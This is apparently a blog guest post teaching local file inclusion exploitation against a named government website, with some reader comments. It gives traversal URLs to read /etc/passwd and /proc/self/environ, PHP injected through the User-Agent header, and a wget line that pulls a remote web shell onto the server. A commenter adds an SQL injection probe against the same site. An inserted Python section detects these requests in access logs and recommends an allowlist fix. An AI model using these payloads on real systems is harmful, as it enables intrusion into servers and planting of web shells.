Let's Start

A Few Things You Need to Start
1) Site vulnerable to LFI ( http://www.bislig.gov.ph )
2) Remote shell ( http://www.yourhosting/urshell.txt )
3) User-Agent switcher ( https://addons.mozilla.org/en-US/firefox...-switcher/ )
4) Mozilla Firefox Browser



First of all, see if your site is vulnerable to LFI (I'm not going to explain how to find it or exploit it).
Try to open etc/passwd
Example: 
http://www.bislig.gov.ph/content1.php?page=5&directLinks=../../../../../../../../../../../../../../etc/passwd

OK, fine. We can open etc/passwd.
Now type proc/self/environ

Example:
http://www.bislig.gov.ph/content1.php?page=5&directLinks=../../../../../../../../../../../../../../proc/self/environ



Now download and install User-Agent switcher.
Go to Tools > Default User-Agent > Edit User Agents
You will get this window.
Now make a new user-agent: go to New > New User-Agent
You will get something like this:

Now leave everything as it is except description and user-agent.
In description, enter a name for it (mine is phpinfo).
In User-Agent, paste this:
<?php phpinfo();?>
Select your User-Agent in Tools > Default User Agent > PHP Info (or whatever your User-Agent is called)

Go to your site and refresh it.
You should get something like this in your site.


Now search for "disable_functions" (Ctrl+F Search function)
Mine is
disable_functions     | no value    | no value
That is good. We can spawn our shell now!
Now go back and edit your User-Agent.
Change "User-Agent" to:
<?exec('wget http://www.sh3ll.org/egy.txt -O shell.php');?>

(What does this function do? It downloads the shell in .txt format and renames it as shell.php.)

Save it and refresh your site.

Go to http://www.LFISITE.com/shell.php (Mine is http://www.bislig.gov.ph/shell.php )

Voila, we have our shell up.
Enjoy.
Demo websites :)
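Seen from the server side, the requests in this walkthrough leave a recognizable trail in the access log: a traversal to proc/self/environ or etc/passwd in the query string, and a PHP open tag where the User-Agent should be. The Python below is an added example, not part of the original post; it flags both in combined-format log lines. The sample lines, IP addresses and timestamps are constructed, and the function names are illustrative.

```python
import re
from urllib.parse import unquote

# Apache/nginx "combined" format: ip - user [time] "request" status size "referer" "user-agent"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+)[^"]*" '
    r'\d{3} \S+ "[^"]*" "(?P<ua>.*)"$'
)
# Directory traversal that ends at one of the two files this post requests.
TRAVERSAL_RE = re.compile(r'(?:\.\.[/\\])+(?:proc/self/environ|etc/passwd)', re.I)
# PHP open tag where a browser name belongs: <?php, <?=, or a short tag such as <?exec(
PHP_TAG_RE = re.compile(r'<\?(?:php|=|\s|[a-z_]+\s*\()', re.I)

# Constructed sample log lines (documentation IP ranges, made-up timestamps).
SAMPLE = [
    '203.0.113.7 - - [10/Oct/2012:13:55:36 +0000] "GET /content1.php?page=5&directLinks=..%2F..%2F..%2Fproc%2Fself%2Fenviron HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Oct/2012:13:56:02 +0000] "GET /content1.php?page=5&directLinks=../../../proc/self/environ HTTP/1.1" 200 54120 "-" "<?php phpinfo();?>"',
    '198.51.100.4 - - [10/Oct/2012:13:57:10 +0000] "GET /content1.php?page=5 HTTP/1.1" 200 2310 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
]

def decode(value, rounds=3):
    """Undo URL encoding, including double encoding, until the value is stable."""
    for _ in range(rounds):
        nxt = unquote(value)
        if nxt == value:
            break
        value = nxt
    return value

def classify(line):
    """Return (ip, reasons) for one log line, or None if it does not parse."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    reasons = set()
    if TRAVERSAL_RE.search(decode(m["target"])):
        reasons.add("traversal")
    if PHP_TAG_RE.search(m["ua"]):
        reasons.add("php-in-ua")
    return m["ip"], reasons

def suspects(lines):
    """Map each client IP to the union of reasons seen across its requests."""
    seen = {}
    for line in lines:
        hit = classify(line)
        if hit and hit[1]:
            seen.setdefault(hit[0], set()).update(hit[1])
    return seen

if __name__ == "__main__":
    for ip, reasons in suspects(SAMPLE).items():
        print(ip, sorted(reasons))
```

A client that shows both reasons has followed the sequence in this post and warrants a search of the web root for newly created .php files. Detection is only a backstop: the fix is to map the `directLinks` value to a fixed allowlist of files instead of using it as a file path.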

About the Author: This post was written by AV. Catch him on his blog. If you are also interested in writing a guest post, then visit this page.


9 comments:

  1. nice Tutorial(MaC)

  2. really nice1....

  3. example site fix now

  4. is the shell still there??

  5. not fixed ... Try sql injection content1.php?mainmenu_id=54'

  6. !lfi /index.php?option=com_myblog&Itemid=12&task= "com_myblog"

  7. This comment has been removed by a blog administrator.
